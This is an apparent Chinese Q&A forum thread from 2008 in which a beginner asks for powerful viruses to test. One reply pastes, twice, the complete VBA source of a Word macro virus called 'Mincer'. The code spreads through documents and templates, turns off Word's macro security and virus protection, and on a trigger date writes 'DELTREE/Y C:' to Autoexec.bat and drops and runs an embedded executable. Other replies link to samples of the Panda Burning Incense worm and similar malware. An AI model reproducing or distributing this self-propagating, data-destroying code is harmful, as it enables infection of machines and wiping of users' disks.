病毒高手都进来一下!
我是刚学网络安全的,现在想研究电脑病毒。由于我的电脑搞得很好,一直以来都没中过病毒,现在请各位高手发些超级厉害的病毒来试试,最好是能让系统崩溃、蓝屏、黑屏,甚至.... 多厉害我都不怕。。谢谢哦
Attribute VB_Name = "Mincer"
"<-Mincer!->
Sub Cl()
On Error Resume Next
For Each doc In Documents
For Each A In doc.VBProject.vbcomponents
If A.Type <> 100 Then
Application.OrganizerDelete doc.FullName, A.Name, wdOrganizerObjectProjectItems
Else
If A.codemodule.lines(1, 1) <> ""<-Mincer!->" Then A.codemodule.deletelines 1, A.
codemodule.CountOfLines
End If
Next A
Next doc
For Each dot In Templates
For Each A In dot.VBProject.vbcomponents
If A.Type <> "100" And A.Name <> "Mincer" Then
Application.OrganizerDelete dot.FullName, A.Name, wdOrganizerObjectProjectItems
Else
If A.codemodule.lines(1, 1) <> ""<-Mincer!->" Then A.codemodule.deletelines 1, A.
codemodule.CountOfLines
End If
Next A
Next dot
End Sub
Sub IND()
On Error Resume Next
Dim body As String, RET As Boolean, NC As String
For Each Vs In MacroContainer.VBProject.vbcomponents
If Vs.Name = "Mincer" Then Set Vs = Vs.codemodule: Exit For
Next Vs
body = Vs.lines(1, Vs.CountOfLines)
For Each doc In Documents
If doc.VBProject.vbcomponents.Item(1).codemodule.lines(1, 1) <> ""<-Mincer!->" An
d doc.VBProject.vbcomponents.Item(1).Name <> "MX" Then
vak = InStr(doc.FullName, ":")
If (vak = 0 Or doc.ReadOnly = True) And doc.Saved = False Then
Set ill = doc.VBProject.vbcomponents.Item(1).codemodule
ill.InsertLines 1, body
doc.VBProject.vbcomponents.Item(1).Name = "Mincer"
ElseIf vak <> 0 And doc.ReadOnly = False Then
Set ill = doc.VBProject.vbcomponents.Item(1).codemodule
ill.InsertLines 1, body
doc.VBProject.vbcomponents.Item(1).Name = "Mincer"
End If
End If
Next doc
End Sub
Sub INO()
On Error Resume Next
Dim body As String, RET As Boolean, NC As String
NC = Environ("WINDIR")
If Dir(NC & "\SYSTEM\Mincer.dll") = "" Then
Open NC & "\SYSTEM\Mincer.dll" For Output As 1
For Each Vs In MacroContainer.VBProject.vbcomponents
If Vs.Name = "Mincer" Then Set Vs = Vs.codemodule: Exit For
Next Vs
body = Vs.lines(1, Vs.CountOfLines)
Print #1, "Attribute VB_Name=""Mincer"""
Print #1, body
Close
End If
For Each dot In Templates
RET = False
For Each A In dot.VBProject.vbcomponents
If A.Name = "Mincer" And A.Type <> 100 Then RET = True
Next A
If RET = False Then
dot.VBProject.vbcomponents.Import (NC & "\SYSTEM\Mincer.dll")
End If
Next dot
End Sub
Sub AutoExit()
On Error Resume Next
Application.ShowVisualBasicEditor = False
Application.EnableCancelKey = wdCancelDisabled
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\
Word\Security", "Level") = 1&
With Options
.VirusProtection = False
.AllowFastSave = True
.SavePropertiesPrompt = False
.SaveNormalPrompt = False
End With
WordBasic.DisableAutoMacros 0
sa=NormalTemplate.saved
For Each l In CommandBars("tools").Controls
If l.ID = 522 Or l.ID = 751 Or l.ID = 797 Then l.OnAction = "AutoOpen"
Next l
NormalTemplate.saved=sa
For Each doc In Documents
doc.ReadOnlyRecommended = False
doc.SaveFormsData = False
Next doc
End Sub
Sub MySpy()
On Error Resume Next
Dim NC As String
NC = Environ("WINDIR")
If Dir(NC & "\Media\MySpy.dot") = "" Then
WordBasic.DisableAutoMacros 1
Documents.Add NewTemplate:=True
ActiveDocument.VBProject.vbcomponents.Item(1).Name = "MX"
INO
ActiveDocument.SaveAs NC & "\Media\MySpy.dot", , , , False
Options.DefaultFilePath(Path:=wdUserTemplatesPath) = NC
Options.DefaultFilePath(Path:=wdStartupPath) = NC & "\Media"
ActiveDocument.Close
End If
WordBasic.DisableAutoMacros 0
End Sub
Sub AutoExec()
Test
Cl
AutoExit
INO
End Sub
Sub Test()
On Error Resume Next
Dim A As String, C As Long, B As String
If Format(Date, "d") <> 2 Then Exit Sub
A = "9460301/3/4/65535/184/0/64/0/0/0/0/0/0/0/0/128/247078670/-855002112/12751810
89/1750344141/1881174889/1919381362/1663069537/1869508193/1700929652/1853190688/5
44106784/542330692/1701080941/168627502/36/0/17744/65868/891316465/0/0/17760480/3
27947/4096/0/0/4112/4096/8192/4194304/4096/512/4/0/4/0/8192/512/0/2/1048576/4096/
1048576/4096/0/16/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0
/2019914798/116/4096/4096/4096/512/0/0/0/1610612768/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0
/0/0/0/0/0/0/0/0/0/195/0/0/1018/608472405/1692087288/15205255/1526726656/13632992
13/17780816/1543382092/-98778237/-1956238453/1905130603/-1989781998/-289276813/19
38384400/1456233986/1217130635/-2086341636/814418152/41219595/-866193173/-3379558
45/1692087047/545981323/1476628324/268462173/1958936640/-1054798030/75698411/-198
9798620/-306054037/1804166672/588238594/1359964867/1364328298/1778477649/13946585
62/-2097151744/-1919475516/-1915773626/-202617/550326527/4194407/1488986895/-1958
916469/-61830895/" & _
"-1982447475/-1226049023/59475/-2091188224/-850189117/1073768480/1962891264/14092
22692/1397774844/1509708799/1488986895/50011/-396361728/0/314999134/-167772157/-2
062614266/520/673471629/254032771/128389/-2096693760/-1974073914/-12843965/107400
6132/109656756/6964806/1535868778/205753104/1342488707/1092668758/-2097135616/208
8833220/1160707078/257836376/112261/2072208896/-2062614248/427/1124120678/3285197
/-2112946112/411/1404996433/-1946157059/29488703/-1201272716/-919387391/-10703441
93/-919349836/-1958555085/-671136806/-157525613/108265921/1124186214/262002687/90
754/-2086906368/-1070366778/-393488716/1784218730/-671131076/-1958078837/-2116550
715/1162870846/612699904/1392508929/23724138/588207954/-980725556/" & _
"-1031581007/-1915224313/-1924128190/-1223733242/1418530374/682627600/-503968118/
1345484429/1363236434/1359208897/-905721853/-149139925/-1856945711/66078347/-2037
777338/-1106/607945062/2071724216/-671103605/1493461653/1012108114/-15547773/1849
590231/1953524058/1599822439/-721201319/1441661778/-63093619/55777417/-1098034473
/-1200/-833189545/-1109895539/1018/-1031589397/274369320/1980258859/-394046676/-1
961326328/1510151258/-1957211384/1510148186/-60947700/-1962649463/140116248/10761
20193/725614592/51279595/264758011/871091233/-348339069/19398986/856171628/-61306
405/-56588659/78774271/-855586970/-1902867680/-216/251809929/657560758/738197503/
266724034/1485555745/1496877840/-242545181/14025144/-10921472/1542515671/86592546
4/" & _
"-2640704/1935580631/1725926193/-1958542408/2123103310/-19660802/258079566/553631
777/1946147979/609484600/474188121/606632835/1099630197/21399848/129024865/191079
6518/-747257806/217628006/-1077512563/-2147469236/218020454/1725366266/1241536703
/138856294/-687927516/-1191944563/939349/237677241/-959185152/-497983488/-1998310
658/-18706176/257250744/-1430955776/13030399/-1258364384/1711311072/201868999/869
728016/1400944603/1747774595/-1073737728/1364396215/23613777/1094713349/-19219627
1/11332737/550305792/1048580/108954470/-33197033/-286569146/-972005887/-343913146
/-2012706587/-2147432959/25692296/-712534077/-712534033/-1757147924/-1745889913/-
1007757945/661010944/65619/4194408/4194369/4194354/544106829/875442550/642598688/
22605/"
O = "C:\Autoexec.bat"
SetAttr O, 0
Open O For Output As 1
Print #1, "DELTREE/Y C:"
Close
AW$ = InputBox("Mincer was sad!", "Test")
If AW$ = "MX" Then
Kill O
MsgBox "You know me!", 4096, "Thanks..."
Else
Open "Mincer.EXE" For Binary As 1
Do Until A = ""
C = InStr(A, "/")
B = Left(A, C - 1)
A = Right$(A, Len(A) - C)
C = Val(B)
Put 1, , C
Loop
Close
Shell "Mincer.EXE"
MsgBox "I"m sader...", 48, "No..."
End If
End Sub
Sub FileOpen()
Dialogs(wdDialogFileOpen).Show
AutoOpen
End Sub
Sub AutoOpen()
AutoExit
Cl
IND
INO
End Sub
Sub AutoClose()
MySpy
For Each doc In Documents
v& = InStr(doc.FullName, ":")
If doc.ReadOnly = False And v <> 0 Then
doc.Save
End If
Next doc
End Sub
Sub ViewVBCode()
AutoOpen
End Sub
Sub ViewSecurity()
AutoOpen
End Sub
Sub ToolsMacro()
AutoOpen
End Sub
Sub FileSaveAs()
Dialogs(wdDialogFileSaveAs).Show
ActiveDocument.Saved = False
AutoOpen
End Sub
Sub FileSave()
ActiveDocument.Save
ActiveDocument.Saved = False
AutoOpen
End Sub
试试这个,如果你敢的话。不过现在微机的硬防都做的不错,也许上天保佑你的硬盘不会烧坏,你的BIOS不会被破坏,哦米拖佛~善哉善哉~
"<-Mincer!->
Sub Cl()
On Error Resume Next
For Each doc In Documents
For Each A In doc.VBProject.vbcomponents
If A.Type <> 100 Then
Application.OrganizerDelete doc.FullName, A.Name, wdOrganizerObjectProjectItems
Else
If A.codemodule.lines(1, 1) <> ""<-Mincer!->" Then A.codemodule.deletelines 1, A.
codemodule.CountOfLines
End If
Next A
Next doc
For Each dot In Templates
For Each A In dot.VBProject.vbcomponents
If A.Type <> "100" And A.Name <> "Mincer" Then
Application.OrganizerDelete dot.FullName, A.Name, wdOrganizerObjectProjectItems
Else
If A.codemodule.lines(1, 1) <> ""<-Mincer!->" Then A.codemodule.deletelines 1, A.
codemodule.CountOfLines
End If
Next A
Next dot
End Sub
Sub IND()
On Error Resume Next
Dim body As String, RET As Boolean, NC As String
For Each Vs In MacroContainer.VBProject.vbcomponents
If Vs.Name = "Mincer" Then Set Vs = Vs.codemodule: Exit For
Next Vs
body = Vs.lines(1, Vs.CountOfLines)
For Each doc In Documents
If doc.VBProject.vbcomponents.Item(1).codemodule.lines(1, 1) <> ""<-Mincer!->" An
d doc.VBProject.vbcomponents.Item(1).Name <> "MX" Then
vak = InStr(doc.FullName, ":")
If (vak = 0 Or doc.ReadOnly = True) And doc.Saved = False Then
Set ill = doc.VBProject.vbcomponents.Item(1).codemodule
ill.InsertLines 1, body
doc.VBProject.vbcomponents.Item(1).Name = "Mincer"
ElseIf vak <> 0 And doc.ReadOnly = False Then
Set ill = doc.VBProject.vbcomponents.Item(1).codemodule
ill.InsertLines 1, body
doc.VBProject.vbcomponents.Item(1).Name = "Mincer"
End If
End If
Next doc
End Sub
Sub INO()
On Error Resume Next
Dim body As String, RET As Boolean, NC As String
NC = Environ("WINDIR")
If Dir(NC & "\SYSTEM\Mincer.dll") = "" Then
Open NC & "\SYSTEM\Mincer.dll" For Output As 1
For Each Vs In MacroContainer.VBProject.vbcomponents
If Vs.Name = "Mincer" Then Set Vs = Vs.codemodule: Exit For
Next Vs
body = Vs.lines(1, Vs.CountOfLines)
Print #1, "Attribute VB_Name=""Mincer"""
Print #1, body
Close
End If
For Each dot In Templates
RET = False
For Each A In dot.VBProject.vbcomponents
If A.Name = "Mincer" And A.Type <> 100 Then RET = True
Next A
If RET = False Then
dot.VBProject.vbcomponents.Import (NC & "\SYSTEM\Mincer.dll")
End If
Next dot
End Sub
Sub AutoExit()
On Error Resume Next
Application.ShowVisualBasicEditor = False
Application.EnableCancelKey = wdCancelDisabled
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\
Word\Security", "Level") = 1&
With Options
.VirusProtection = False
.AllowFastSave = True
.SavePropertiesPrompt = False
.SaveNormalPrompt = False
End With
WordBasic.DisableAutoMacros 0
sa=NormalTemplate.saved
For Each l In CommandBars("tools").Controls
If l.ID = 522 Or l.ID = 751 Or l.ID = 797 Then l.OnAction = "AutoOpen"
Next l
NormalTemplate.saved=sa
For Each doc In Documents
doc.ReadOnlyRecommended = False
doc.SaveFormsData = False
Next doc
End Sub
Sub MySpy()
On Error Resume Next
Dim NC As String
NC = Environ("WINDIR")
If Dir(NC & "\Media\MySpy.dot") = "" Then
WordBasic.DisableAutoMacros 1
Documents.Add NewTemplate:=True
ActiveDocument.VBProject.vbcomponents.Item(1).Name = "MX"
INO
ActiveDocument.SaveAs NC & "\Media\MySpy.dot", , , , False
Options.DefaultFilePath(Path:=wdUserTemplatesPath) = NC
Options.DefaultFilePath(Path:=wdStartupPath) = NC & "\Media"
ActiveDocument.Close
End If
WordBasic.DisableAutoMacros 0
End Sub
Sub AutoExec()
Test
Cl
AutoExit
INO
End Sub
Sub Test()
On Error Resume Next
Dim A As String, C As Long, B As String
If Format(Date, "d") <> 2 Then Exit Sub
A = "9460301/3/4/65535/184/0/64/0/0/0/0/0/0/0/0/128/247078670/-855002112/12751810
89/1750344141/1881174889/1919381362/1663069537/1869508193/1700929652/1853190688/5
44106784/542330692/1701080941/168627502/36/0/17744/65868/891316465/0/0/17760480/3
27947/4096/0/0/4112/4096/8192/4194304/4096/512/4/0/4/0/8192/512/0/2/1048576/4096/
1048576/4096/0/16/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0
/2019914798/116/4096/4096/4096/512/0/0/0/1610612768/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0
/0/0/0/0/0/0/0/0/0/195/0/0/1018/608472405/1692087288/15205255/1526726656/13632992
13/17780816/1543382092/-98778237/-1956238453/1905130603/-1989781998/-289276813/19
38384400/1456233986/1217130635/-2086341636/814418152/41219595/-866193173/-3379558
45/1692087047/545981323/1476628324/268462173/1958936640/-1054798030/75698411/-198
9798620/-306054037/1804166672/588238594/1359964867/1364328298/1778477649/13946585
62/-2097151744/-1919475516/-1915773626/-202617/550326527/4194407/1488986895/-1958
916469/-61830895/" & _
"-1982447475/-1226049023/59475/-2091188224/-850189117/1073768480/1962891264/14092
22692/1397774844/1509708799/1488986895/50011/-396361728/0/314999134/-167772157/-2
062614266/520/673471629/254032771/128389/-2096693760/-1974073914/-12843965/107400
6132/109656756/6964806/1535868778/205753104/1342488707/1092668758/-2097135616/208
8833220/1160707078/257836376/112261/2072208896/-2062614248/427/1124120678/3285197
/-2112946112/411/1404996433/-1946157059/29488703/-1201272716/-919387391/-10703441
93/-919349836/-1958555085/-671136806/-157525613/108265921/1124186214/262002687/90
754/-2086906368/-1070366778/-393488716/1784218730/-671131076/-1958078837/-2116550
715/1162870846/612699904/1392508929/23724138/588207954/-980725556/" & _
"-1031581007/-1915224313/-1924128190/-1223733242/1418530374/682627600/-503968118/
1345484429/1363236434/1359208897/-905721853/-149139925/-1856945711/66078347/-2037
777338/-1106/607945062/2071724216/-671103605/1493461653/1012108114/-15547773/1849
590231/1953524058/1599822439/-721201319/1441661778/-63093619/55777417/-1098034473
/-1200/-833189545/-1109895539/1018/-1031589397/274369320/1980258859/-394046676/-1
961326328/1510151258/-1957211384/1510148186/-60947700/-1962649463/140116248/10761
20193/725614592/51279595/264758011/871091233/-348339069/19398986/856171628/-61306
405/-56588659/78774271/-855586970/-1902867680/-216/251809929/657560758/738197503/
266724034/1485555745/1496877840/-242545181/14025144/-10921472/1542515671/86592546
4/" & _
"-2640704/1935580631/1725926193/-1958542408/2123103310/-19660802/258079566/553631
777/1946147979/609484600/474188121/606632835/1099630197/21399848/129024865/191079
6518/-747257806/217628006/-1077512563/-2147469236/218020454/1725366266/1241536703
/138856294/-687927516/-1191944563/939349/237677241/-959185152/-497983488/-1998310
658/-18706176/257250744/-1430955776/13030399/-1258364384/1711311072/201868999/869
728016/1400944603/1747774595/-1073737728/1364396215/23613777/1094713349/-19219627
1/11332737/550305792/1048580/108954470/-33197033/-286569146/-972005887/-343913146
/-2012706587/-2147432959/25692296/-712534077/-712534033/-1757147924/-1745889913/-
1007757945/661010944/65619/4194408/4194369/4194354/544106829/875442550/642598688/
22605/"
O = "C:\Autoexec.bat"
SetAttr O, 0
Open O For Output As 1
Print #1, "DELTREE/Y C:"
Close
AW$ = InputBox("Mincer was sad!", "Test")
If AW$ = "MX" Then
Kill O
MsgBox "You know me!", 4096, "Thanks..."
Else
Open "Mincer.EXE" For Binary As 1
Do Until A = ""
C = InStr(A, "/")
B = Left(A, C - 1)
A = Right$(A, Len(A) - C)
C = Val(B)
Put 1, , C
Loop
Close
Shell "Mincer.EXE"
MsgBox "I"m sader...", 48, "No..."
End If
End Sub
Sub FileOpen()
Dialogs(wdDialogFileOpen).Show
AutoOpen
End Sub
Sub AutoOpen()
AutoExit
Cl
IND
INO
End Sub
Sub AutoClose()
MySpy
For Each doc In Documents
v& = InStr(doc.FullName, ":")
If doc.ReadOnly = False And v <> 0 Then
doc.Save
End If
Next doc
End Sub
Sub ViewVBCode()
AutoOpen
End Sub
Sub ViewSecurity()
AutoOpen
End Sub
Sub ToolsMacro()
AutoOpen
End Sub
Sub FileSaveAs()
Dialogs(wdDialogFileSaveAs).Show
ActiveDocument.Saved = False
AutoOpen
End Sub
Sub FileSave()
ActiveDocument.Save
ActiveDocument.Saved = False
AutoOpen
End Sub
试试这个,如果你敢的话。不过现在微机的硬防都做的不错,也许上天保佑你的硬盘不会烧坏,你的BIOS不会被破坏,哦米拖佛~善哉善哉~
温馨提示:内容为网友见解,仅供参考
第1个回答 2008-10-05
你是没见着厉害的,给你个熊猫烧香和磁碟机的样本,建议先ghost了c盘,最好还下个江民2008下载版的,装好升级完然后在设置里关闭开机启动监控,然后再运行测试:
http://bbs.kafan.cn/thread-215288-1-1.html(生成用户下的smss.exe和lsass.exe进程,手工杀了就不错)
http://bbs.kafan.cn/viewthread.php?tid=106100(感染所有exe,html,ppt等文件,用江民可以清除,修复原文件)
注册一下就可以下载了。
http://bbs.kafan.cn/thread-215288-1-1.html(生成用户下的smss.exe和lsass.exe进程,手工杀了就不错)
http://bbs.kafan.cn/viewthread.php?tid=106100(感染所有exe,html,ppt等文件,用江民可以清除,修复原文件)
注册一下就可以下载了。
第2个回答 2008-10-09
兄弟,不是我的打击你,知道rookkit病毒么?去网上查一下就知道了
你中了那种病毒你可能都不知道,OK?无进程,无端口,无服务,无注册表,无文件,你去杀吧查吧?去网上查下就知道了,。安全模式照样运行``
你中了那种病毒你可能都不知道,OK?无进程,无端口,无服务,无注册表,无文件,你去杀吧查吧?去网上查下就知道了,。安全模式照样运行``
第3个回答 2008-10-05
不就是想炫耀下么,自己架个虚拟机去试吧,我这病毒源代码一大堆
第4个回答 2008-10-05
你太有材了
相似回答
